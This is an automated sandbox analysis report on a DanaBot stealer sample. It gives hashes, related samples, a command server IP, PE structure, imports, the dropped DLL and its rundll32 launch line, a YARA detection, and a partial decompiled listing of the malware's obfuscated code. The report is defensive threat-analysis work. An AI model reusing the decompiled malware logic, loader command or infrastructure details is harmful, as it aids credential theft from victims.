      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      192.119.110.73r5dg48tzWR.exeGet hashmaliciousBrowse
        r5dg48tzWR.exeGet hashmaliciousBrowse
          90IiTfL2vn.exeGet hashmaliciousBrowse
            90IiTfL2vn.exeGet hashmaliciousBrowse
              77MWDXnhai.exeGet hashmaliciousBrowse
                d90kpUuYZU.exeGet hashmaliciousBrowse
                  vcf0jrhJyH.exeGet hashmaliciousBrowse
                    200LMoOpWw.exeGet hashmaliciousBrowse
                      PD0G13dDKY.exeGet hashmaliciousBrowse
                        B4gqZFwTnP.exeGet hashmaliciousBrowse
                          aL7vpCpOtx.exeGet hashmaliciousBrowse
                            5GTlzvNAwO.exeGet hashmaliciousBrowse
                              ox1kDa9Dph.exeGet hashmaliciousBrowse
                                ox1kDa9Dph.exeGet hashmaliciousBrowse
                                  SXd2L9RZER.exeGet hashmaliciousBrowse
                                    SXd2L9RZER.exeGet hashmaliciousBrowse
                                      mxWPmLZA2b.exeGet hashmaliciousBrowse
                                        mxWPmLZA2b.exeGet hashmaliciousBrowse
                                          dIom275p35.exeGet hashmaliciousBrowse
                                            dIom275p35.exeGet hashmaliciousBrowse

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HOSTWINDSUSr5dg48tzWR.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              r5dg48tzWR.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              90IiTfL2vn.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              90IiTfL2vn.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              77MWDXnhai.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              d90kpUuYZU.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              vcf0jrhJyH.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              200LMoOpWw.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              HSBC Payment Advice.exeGet hashmaliciousBrowse
                                              • 104.168.149.83
                                              PD0G13dDKY.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              B4gqZFwTnP.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              aL7vpCpOtx.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              5GTlzvNAwO.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              ox1kDa9Dph.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              ox1kDa9Dph.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              SXd2L9RZER.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              SXd2L9RZER.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              mxWPmLZA2b.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              mxWPmLZA2b.exeGet hashmaliciousBrowse
                                              • 192.119.110.73
                                              dIom275p35.exeGet hashmaliciousBrowse
                                              • 192.119.110.73

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\Desktop\COY2GA~1.EXE.dll
                                              Process:C:\Users\user\Desktop\Coy2GAiARw.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1407488
                                              Entropy (8bit):6.678243409594869
                                              Encrypted:false
                                              SSDEEP:24576:z8pWEmCxRJvbip/sVJ5u5+JAMh9sweYgoGZH4vQWTIZMb77Qz:YfNJAMh9ynh4vQWTkn
                                              MD5:8B8486B5FC4DCF1C6120FA222F2A9082
                                              SHA1:C13E895A845E3F22BE68B567B69E9BDACA24018F
                                              SHA-256:4FB35A20EED93D90C9AC2FAA0ECB2F9735A872CDECF7FA465FFAC379A2EB8E16
                                              SHA-512:E7DEA9C422B06A457E918B0DCE4B3396690F3A5D913FD9F7D0042DD8789A879E6A2EF3ECF0C246B8F1D730FC64DC0A54314B1C8D084AF11C98B3E9068BA286CA
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, Author: Joe Security
                                              Reputation:low
                                              Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....ga..........................................@.......................... ...........................................................0..........................................................................0................................text.............................. ..`.itext.............................. ..`.data...............................@....bss.....^...P...........................idata...............:..............@....didata..............T..............@....edata...............X..............@..@.rdata..D............Z..............@..@.reloc...............\..............@..B.rsrc....0.......0...J..............@..@............. .......z..............@..@........................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Entropy (8bit):7.883013679667207
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 99.94%
                                              • Clipper DOS Executable (2020/12) 0.02%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • VXD Driver (31/22) 0.00%
                                              File name:Coy2GAiARw.exe
                                              File size:1159680
                                              MD5:5ad64bb7be7914ad793ae5ccb98a571e
                                              SHA1:60aeca403754af25ff307050496a70eabe706a8a
                                              SHA256:18ae9ea1c1d71b33777c8772248580f17a2bcecf1aa0e8f71ec15d4b33d5253b
                                              SHA512:a08299221b3bcca7808c84480785656bd49dc439b028bf6b1cd44682a6b6c43ffed84c3f452d3578f9408adcf79233ad86a65b619d60004fbd6b2a30df4f7019
                                              SSDEEP:24576:xTcsunDS/lXSKgG3DSRGNp0IMXgZlnLei6Qpf8H89IS:VAWlXqbAp0XMnqLc8
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L....Te_...........

                                              File Icon

                                              Icon Hash:e4a6daac9c8c9eb0

                                              Static PE Info

                                              General

                                              Entrypoint:0x401b90
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                              Time Stamp:0x5F65541F [Sat Sep 19 00:43:11 2020 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:5
                                              OS Version Minor:1
                                              File Version Major:5
                                              File Version Minor:1
                                              Subsystem Version Major:5
                                              Subsystem Version Minor:1
                                              Import Hash:9a761cc30337d6ef5b44d15f62f53af5

                                              Entrypoint Preview

                                              Instruction
                                              call 00007FF670770B2Ch
                                              jmp 00007FF67076DBEEh
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              call 00007FF67076DD9Ch
                                              xchg cl, ch
                                              jmp 00007FF67076DD84h
                                              call 00007FF67076DD93h
                                              fxch st(0), st(1)
                                              jmp 00007FF67076DD7Bh
                                              fabs
                                              fld1
                                              mov ch, cl
                                              xor cl, cl
                                              jmp 00007FF67076DD71h
                                              mov byte ptr [ebp-00000090h], FFFFFFFEh
                                              fabs
                                              fxch st(0), st(1)
                                              fabs
                                              fxch st(0), st(1)
                                              fpatan
                                              or cl, cl
                                              je 00007FF67076DD66h
                                              fldpi
                                              fsubrp st(1), st(0)
                                              or ch, ch
                                              je 00007FF67076DD64h
                                              fchs
                                              ret
                                              fabs
                                              fld st(0), st(0)
                                              fld st(0), st(0)
                                              fld1
                                              fsubrp st(1), st(0)
                                              fxch st(0), st(1)
                                              fld1
                                              faddp st(1), st(0)
                                              fmulp st(1), st(0)
                                              ftst
                                              wait
                                              fstsw word ptr [ebp-000000A0h]
                                              wait
                                              test byte ptr [ebp-0000009Fh], 00000001h
                                              jne 00007FF67076DD67h
                                              xor ch, ch
                                              fsqrt
                                              ret
                                              pop eax
                                              jmp 00007FF670770CFFh
                                              fstp st(0)
                                              fld tbyte ptr [004FCDCAh]
                                              ret
                                              fstp st(0)
                                              or cl, cl
                                              je 00007FF67076DD6Dh
                                              fstp st(0)
                                              fldpi
                                              or ch, ch
                                              je 00007FF67076DD64h
                                              fchs
                                              ret
                                              fstp st(0)
                                              fldz
                                              or ch, ch
                                              je 00007FF67076DD59h
                                              fchs
                                              ret
                                              fstp st(0)
                                              jmp 00007FF670770CD5h
                                              fstp st(0)
                                              mov cl, ch
                                              jmp 00007FF67076DD62h
                                              call 00007FF67076DD2Eh
                                              jmp 00007FF670770CE0h
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              int3
                                              push ebp
                                              mov ebp, esp
                                              add esp, 00FFFD30h

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0xffa740x28.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1730000x19248.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0xfc1a00x1c.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0xfe4080x18.rdata
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfe3c00x40.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0xfc0000x150.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000xfae4c0xfb000False0.980722617343data7.99111772368IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0xfc0000x41e00x4200False0.27959280303data4.10242644671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1010000x6f44c0x2200False0.196461397059data2.18669345376IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .nusavu0x1710000x2700x400False0.0166015625data0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .pudipuv0x1720000x170x200False0.02734375data0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x1730000x192480x19400False0.648089418317data6.25957183656IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_CURSOR0x18a0d00x130data
                                              RT_CURSOR0x18a2180xea8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                              RT_CURSOR0x18b0c00x8a8dBase III DBT, version number 0, next free block index 40, 1st item "\251\317"
                                              RT_CURSOR0x18b9900x130data
                                              RT_CURSOR0x18bac00xb0GLS_BINARY_LSB_FIRST
                                              RT_ICON0x1738800x6c8data
                                              RT_ICON0x173f480x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x1744b00x25a8data
                                              RT_ICON0x176a580x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x176f000xea8data
                                              RT_ICON0x177da80x8a8data
                                              RT_ICON0x1786500x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x178bb80x25a8data
                                              RT_ICON0x17b1600x10a8data
                                              RT_ICON0x17c2080x988data
                                              RT_ICON0x17cb900x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x17d0600xea8data
                                              RT_ICON0x17df080x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 8552318, next used block 11647165
                                              RT_ICON0x17e7b00x6c8data
                                              RT_ICON0x17ee780x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x17f3e00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                              RT_ICON0x1819880x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 719103179, next used block 786077129
                                              RT_ICON0x182a300x988data
                                              RT_ICON0x1833b80x468GLS_BINARY_LSB_FIRST
                                              RT_ICON0x1838980xea8data
                                              RT_ICON0x1847400x8a8data
                                              RT_ICON0x184fe80x6c8data
                                              RT_ICON0x1856b00x568GLS_BINARY_LSB_FIRST
                                              RT_ICON0x185c180x25a8data
                                              RT_ICON0x1881c00x10a8data
                                              RT_ICON0x1892680x988data
                                              RT_ICON0x189bf00x468GLS_BINARY_LSB_FIRST
                                              RT_STRING0x18bd500x44edataEnglishTrinidad
                                              RT_STRING0x18c1a00xa4dataEnglishTrinidad
                                              RT_GROUP_CURSOR0x18a2000x14data
                                              RT_GROUP_CURSOR0x18b9680x22data
                                              RT_GROUP_CURSOR0x18bb700x22data
                                              RT_GROUP_ICON0x18a0580x76data
                                              RT_GROUP_ICON0x1838200x76data
                                              RT_GROUP_ICON0x176ec00x3edata
                                              RT_GROUP_ICON0x17cff80x68data
                                              RT_VERSION0x18bb980x1b4data

                                              Imports

                                              DLLImport
                                              KERNEL32.dllHeapReAlloc, UnmapViewOfFile, GetCurrentProcess, SleepEx, ReadConsoleW, GetEnvironmentStrings, InitAtomTable, HeapDestroy, FindNextVolumeW, WriteConsoleW, GetModuleFileNameW, CreateActCtxA, GetOverlappedResult, GetACP, ReleaseSemaphore, DeactivateActCtx, SetLastError, GetProcAddress, ResetEvent, GetAtomNameA, LocalAlloc, GetModuleHandleA, GetProcessShutdownParameters, EraseTape, VirtualProtect, EndUpdateResourceA, LCMapStringW, lstrcpyA, EncodePointer, DecodePointer, GetCommandLineW, HeapSetInformation, GetStartupInfoW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetModuleHandleW, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapAlloc, EnterCriticalSection, LeaveCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, HeapFree, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, SetFilePointer, CloseHandle, ExitProcess, WriteFile, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo, GetOEMCP, IsValidCodePage, Sleep, WideCharToMultiByte, RtlUnwind, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LoadLibraryW, RaiseException, MultiByteToWideChar, GetStringTypeW, IsProcessorFeaturePresent, HeapSize, CreateFileW

                                              Version Infos

                                              DescriptionData
                                              InternalNamenatgpianizu.iwa
                                              ProductVersion91.40.21.87
                                              CopyrightCopyrighz (C) 2021, fudkagat
                                              Translation0x0196 0x03fe

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishTrinidad

                                              Network Behavior

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 14, 2021 11:51:23.434040070 CEST49742443192.168.2.3192.119.110.73
                                              Oct 14, 2021 11:51:23.434083939 CEST44349742192.119.110.73192.168.2.3
                                              Oct 14, 2021 11:51:23.434166908 CEST49742443192.168.2.3192.119.110.73
                                              Oct 14, 2021 11:51:23.568929911 CEST49742443192.168.2.3192.119.110.73
                                              Oct 14, 2021 11:51:23.569027901 CEST44349742192.119.110.73192.168.2.3
                                              Oct 14, 2021 11:51:23.569114923 CEST44349742192.119.110.73192.168.2.3
                                              Oct 14, 2021 11:51:23.569117069 CEST49742443192.168.2.3192.119.110.73
                                              Oct 14, 2021 11:51:23.569152117 CEST44349742192.119.110.73192.168.2.3

                                              Code Manipulations

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Start time:11:51:13
                                              Start date:14/10/2021
                                              Path:C:\Users\user\Desktop\Coy2GAiARw.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Coy2GAiARw.exe'
                                              Imagebase:0x400000
                                              File size:1159680 bytes
                                              MD5 hash:5AD64BB7BE7914AD793AE5CCB98A571E
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Yara matches:
                                              • Rule: JoeSecurity_DanaBot_stealer_dll_1, Description: Yara detected DanaBot stealer dll, Source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              General

                                              Start time:11:51:21
                                              Start date:14/10/2021
                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
                                              Imagebase:0xd10000
                                              File size:61952 bytes
                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Borland Delphi
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                              Reset < >

                                                Executed Functions

                                                C-Code - Quality: 91%
                                                			E004EE96C(void* __ebx, void* __edi, void* __esi) {
                                                				char _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				struct HINSTANCE__* _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				char _v48;
                                                				intOrPtr _v52;
                                                				signed int _v56;
                                                				intOrPtr _v60;
                                                				signed int _t562;
                                                				signed int _t567;
                                                				void* _t570;
                                                				void* _t577;
                                                				signed int _t580;
                                                				signed int _t582;
                                                				signed int _t585;
                                                				signed int _t587;
                                                				void* _t589;
                                                				signed int _t605;
                                                				signed int _t607;
                                                				signed int _t609;
                                                				void* _t614;
                                                				signed int _t616;
                                                				signed int _t619;
                                                				signed int _t621;
                                                				void* _t623;
                                                				signed int _t627;
                                                				signed int _t628;
                                                				signed int _t629;
                                                				void* _t631;
                                                				signed int _t634;
                                                				signed int _t641;
                                                				signed int _t643;
                                                				intOrPtr _t644;
                                                				void* _t645;
                                                				signed int _t647;
                                                				void* _t656;
                                                				signed int _t658;
                                                				signed int _t659;
                                                				void* _t662;
                                                				void* _t664;
                                                				void* _t665;
                                                				signed int _t666;
                                                				void* _t668;
                                                				signed int _t669;
                                                				signed int _t670;
                                                				signed int _t672;
                                                				signed int _t676;
                                                				signed int _t678;
                                                				signed int _t679;
                                                				signed int _t682;
                                                				void* _t686;
                                                				signed int _t696;
                                                				void* _t698;
                                                				signed int _t700;
                                                				signed int _t703;
                                                				void* _t710;
                                                				void* _t713;
                                                				signed int _t715;
                                                				signed int _t724;
                                                				signed int _t726;
                                                				signed int _t728;
                                                				void* _t729;
                                                				signed int _t733;
                                                				signed int _t736;
                                                				signed int _t737;
                                                				void* _t738;
                                                				signed int _t739;
                                                				signed int _t744;
                                                				signed int _t745;
                                                				signed int _t748;
                                                				signed int _t750;
                                                				signed int _t752;
                                                				signed int _t758;
                                                				signed int _t759;
                                                				signed int _t761;
                                                				signed int _t762;
                                                				signed int _t763;
                                                				signed int _t765;
                                                				signed int _t766;
                                                				signed int _t772;
                                                				void* _t774;
                                                				void* _t776;
                                                				signed int _t777;
                                                				signed int _t778;
                                                				intOrPtr _t780;
                                                				signed int _t781;
                                                				void* _t782;
                                                				void* _t783;
                                                				signed int _t785;
                                                				void* _t791;
                                                				signed int _t793;
                                                				signed int _t794;
                                                				signed int _t797;
                                                				signed int _t801;
                                                				signed int _t802;
                                                				signed int _t804;
                                                				void* _t809;
                                                				void* _t811;
                                                				signed int _t814;
                                                				signed int _t830;
                                                				signed int _t834;
                                                				signed int _t836;
                                                				signed int _t838;
                                                				void* _t842;
                                                				signed int _t847;
                                                				signed int _t850;
                                                				signed int _t852;
                                                				signed int _t859;
                                                				void* _t865;
                                                				signed int _t876;
                                                				signed int _t878;
                                                				void* _t880;
                                                				signed int _t885;
                                                				signed int _t887;
                                                				void* _t896;
                                                				signed int _t898;
                                                				signed int _t901;
                                                				void* _t908;
                                                				void* _t910;
                                                				void* _t918;
                                                				signed int _t920;
                                                				void* _t927;
                                                				signed int _t928;
                                                				signed int _t930;
                                                				signed int _t931;
                                                				void* _t933;
                                                				signed int _t935;
                                                				void* _t936;
                                                				signed int _t939;
                                                				void* _t944;
                                                				signed int _t945;
                                                				signed int _t946;
                                                				signed int _t951;
                                                				signed int _t952;
                                                				void* _t953;
                                                				void* _t954;
                                                				signed int _t955;
                                                				signed int _t958;
                                                				signed int _t966;
                                                				signed int _t968;
                                                				void* _t972;
                                                				signed int _t983;
                                                				signed int _t984;
                                                				signed int _t990;
                                                				signed int _t993;
                                                				signed int _t995;
                                                				signed int _t996;
                                                				signed int _t998;
                                                				signed int _t1009;
                                                				void* _t1013;
                                                				signed int _t1015;
                                                				signed int _t1019;
                                                				signed int _t1023;
                                                				void* _t1024;
                                                				void* _t1026;
                                                				signed int _t1028;
                                                				signed int _t1035;
                                                				signed int _t1036;
                                                				signed int _t1037;
                                                				signed int _t1038;
                                                				signed int _t1046;
                                                				signed int _t1048;
                                                				signed int _t1050;
                                                				signed int _t1051;
                                                				signed int _t1052;
                                                				signed int _t1053;
                                                				signed int _t1054;
                                                				signed int _t1056;
                                                				signed int _t1066;
                                                				signed int _t1067;
                                                				void* _t1068;
                                                				signed int _t1074;
                                                				void* _t1077;
                                                				signed int _t1079;
                                                				signed int _t1080;
                                                				void* _t1081;
                                                				void* _t1087;
                                                				signed int _t1095;
                                                				signed int _t1099;
                                                				signed int _t1101;
                                                				struct HINSTANCE__* _t1102;
                                                				signed int _t1107;
                                                				void* _t1109;
                                                				signed int _t1111;
                                                				signed int _t1112;
                                                				signed int _t1113;
                                                				signed int _t1116;
                                                				void* _t1117;
                                                				void* _t1119;
                                                				signed int _t1123;
                                                				signed int _t1131;
                                                				void* _t1133;
                                                				signed int _t1138;
                                                				signed int _t1145;
                                                				void* _t1147;
                                                				signed int _t1152;
                                                				signed int _t1155;
                                                				void* _t1157;
                                                				signed int _t1162;
                                                				signed int _t1166;
                                                				signed int _t1168;
                                                				signed int _t1169;
                                                				signed int _t1171;
                                                				void* _t1172;
                                                				signed int _t1173;
                                                				signed int _t1174;
                                                				signed int _t1176;
                                                				intOrPtr _t1180;
                                                				void* _t1184;
                                                				signed int _t1187;
                                                				void* _t1189;
                                                				signed int _t1191;
                                                				signed int _t1192;
                                                				signed int _t1193;
                                                				signed int _t1195;
                                                				signed int _t1197;
                                                				signed int _t1198;
                                                				signed int _t1199;
                                                				void* _t1201;
                                                				signed int _t1203;
                                                				void* _t1207;
                                                				signed int _t1208;
                                                				signed int _t1215;
                                                				signed int _t1217;
                                                				signed int _t1221;
                                                				signed int _t1227;
                                                				void* _t1229;
                                                				signed int _t1236;
                                                				signed int _t1239;
                                                				void* _t1241;
                                                				signed int _t1244;
                                                				signed int _t1249;
                                                				signed int _t1250;
                                                				signed int _t1254;
                                                				signed int _t1256;
                                                				signed int _t1258;
                                                				signed int _t1260;
                                                				signed int _t1261;
                                                				signed int _t1262;
                                                				void* _t1263;
                                                				signed int _t1264;
                                                				signed int _t1267;
                                                				signed int _t1272;
                                                				signed int _t1273;
                                                				signed int _t1275;
                                                				signed int _t1277;
                                                				signed int _t1278;
                                                				signed int _t1281;
                                                				signed int _t1285;
                                                				void* _t1298;
                                                				signed int _t1300;
                                                				signed int _t1302;
                                                				signed int _t1303;
                                                				signed int _t1306;
                                                				signed int _t1310;
                                                				void* _t1311;
                                                				signed int _t1318;
                                                				signed int _t1322;
                                                				signed int _t1324;
                                                				signed int _t1325;
                                                				signed int _t1331;
                                                				signed int _t1334;
                                                				signed int _t1341;
                                                				signed int _t1343;
                                                				signed int _t1346;
                                                				signed int _t1350;
                                                				signed int _t1352;
                                                				signed int _t1354;
                                                				signed int _t1355;
                                                				void* _t1356;
                                                				void* _t1361;
                                                				signed int _t1363;
                                                				signed int _t1364;
                                                				void* _t1365;
                                                				signed int _t1366;
                                                				signed int _t1370;
                                                				signed int _t1371;
                                                				signed int _t1372;
                                                				signed int _t1373;
                                                				signed int _t1376;
                                                				signed int _t1378;
                                                				signed int _t1380;
                                                				signed int _t1381;
                                                				signed int _t1383;
                                                				signed int _t1387;
                                                				void* _t1388;
                                                				signed int _t1390;
                                                				signed int _t1401;
                                                				signed int _t1405;
                                                				void* _t1409;
                                                				void* _t1411;
                                                				signed int _t1413;
                                                				void* _t1417;
                                                				signed int _t1427;
                                                				signed int _t1429;
                                                				signed int _t1434;
                                                				signed int _t1440;
                                                				intOrPtr _t1447;
                                                				intOrPtr _t1448;
                                                				signed int _t1449;
                                                				signed int _t1452;
                                                				void* _t1453;
                                                				void* _t1463;
                                                				signed int _t1465;
                                                				void* _t1466;
                                                				signed int _t1467;
                                                				signed int _t1478;
                                                				signed int _t1484;
                                                				signed int _t1485;
                                                				signed int _t1486;
                                                				intOrPtr _t1488;
                                                				void* _t1492;
                                                				signed int _t1493;
                                                				signed int _t1500;
                                                				signed int _t1502;
                                                				void* _t1505;
                                                				signed int _t1506;
                                                				signed int _t1510;
                                                				void* _t1516;
                                                				intOrPtr _t1535;
                                                				void* _t1539;
                                                				void* _t1540;
                                                				intOrPtr _t1541;
                                                				void* _t1549;
                                                				void* _t1555;
                                                				void* _t1556;
                                                				void* _t1559;
                                                				void* _t1562;
                                                				signed int _t1564;
                                                				void* _t1576;
                                                				void* _t1577;
                                                				void* _t1581;
                                                				void* _t1582;
                                                				void* _t1586;
                                                				void* _t1587;
                                                				void* _t1602;
                                                				void* _t1605;
                                                				void* _t1606;
                                                				void* _t1607;
                                                				void* _t1611;
                                                				void* _t1616;
                                                				void* _t1623;
                                                				void* _t1626;
                                                				void* _t1628;
                                                				void* _t1630;
                                                				void* _t1636;
                                                				void* _t1641;
                                                				void* _t1642;
                                                				void* _t1643;
                                                				void* _t1646;
                                                				void* _t1660;
                                                				void* _t1669;
                                                
                                                				_t1395 = __ebx;
                                                				_t1539 = _t1540;
                                                				_t1541 = _t1540 + 0xffffffc8;
                                                				_push(__ebx);
                                                				_v8 = 0;
                                                				_push(_t1539);
                                                				_push(0x4f07fa);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1541;
                                                				_push(_t1539);
                                                				_push(0x4f065b);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t1541;
                                                				_v32 = 0;
                                                				if(_v32 >= 2) {
                                                					L4:
                                                					_t562 = E004FEF50; // 0xa3b3f6c0
                                                					 *0x4feedc = _t562 *  *0x4feeec;
                                                					E00407678(_v8, 0, 1,  &_v8);
                                                					_t567 =  *0x4feef0; // 0x44632301
                                                					if(_t567 -  *0x4fef28 < 0x68) {
                                                						_t1381 = E004FEF0C; // 0xb52124bf
                                                						 *0x4fef04 = _t1381 +  *0x4feefc;
                                                						_t1383 = E004FEF10; // 0x1cb931c0
                                                						E004FEF10 = E0040489C(_t1383);
                                                					}
                                                					 *0x4fef30 = E004FEED0 * 0xc2;
                                                					_t570 = E004FEED0; // 0xc3c34ef0
                                                					 *0x4fef44 = _t570 +  *0x4feed8;
                                                					_v36 = GetModuleHandleW(L"advapi32.dll");
                                                					_v16 = _v28 + _v32;
                                                					if(_v24 + _v20 != _v20) {
                                                						L10:
                                                						_t577 = E004FEED0; // 0xc3c34ef0
                                                						 *0x4feefc = _t577 -  *0x4feee0;
                                                						asm("fild dword [0x4feee8]");
                                                						E004FEF10 = E004048D8();
                                                						_t580 =  *0x4feefc; // 0x4b08dcc7
                                                						E004FEF2C = _t580 + E004FEF20;
                                                						_t582 =  *0x4fef30; // 0xa1d816
                                                						 *0x4fef3c = _t582 +  *0x4fef4c;
                                                						if(_v36 == 0) {
                                                							L192:
                                                							asm("fild dword [ebp-0xc]");
                                                							_v24 = E004048D8();
                                                							_t585 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4fef44 = _t585 * E004FEF20;
                                                							_t587 =  *0x4feef4; // 0xb52124ca
                                                							 *0x4feecc = _t587 + 4;
                                                							_t589 = E004FEF0C; // 0xb52124bf
                                                							 *0x4feee8 = _t589 + 0x3b;
                                                							if(_v28 - _v16 == _v16) {
                                                								asm("fild dword [0x4feeec]");
                                                								 *0x4fef04 = E004048CC();
                                                							}
                                                							_pop(_t1447);
                                                							 *[fs:eax] = _t1447;
                                                							_pop(_t1448);
                                                							 *[fs:eax] = _t1448;
                                                							_push(E004F0801);
                                                							return E004069A8( &_v8);
                                                						} else {
                                                							 *0x505900 = GetProcAddress(_v36, "CryptAcquireContextA");
                                                							_v20 = _v32 + 0x93;
                                                							_v24 = _v16 - 0x72;
                                                							 *0x4fef3c =  *0x4feee8 * 0x3c;
                                                							_t605 = E004FEF00; // 0xa3b3f6c0
                                                							 *0x4fef4c = _t605 - 0x3a;
                                                							_t607 =  *0x4feea0; // 0xa1d900
                                                							_t1449 =  *0x4feef0; // 0x44632301
                                                							if(_t607 -  *0x4feecc <= _t1449 -  *0x4feecc) {
                                                								_t609 =  *0x4feea0; // 0xa1d900
                                                								 *0x4feee8 = _t609;
                                                							} else {
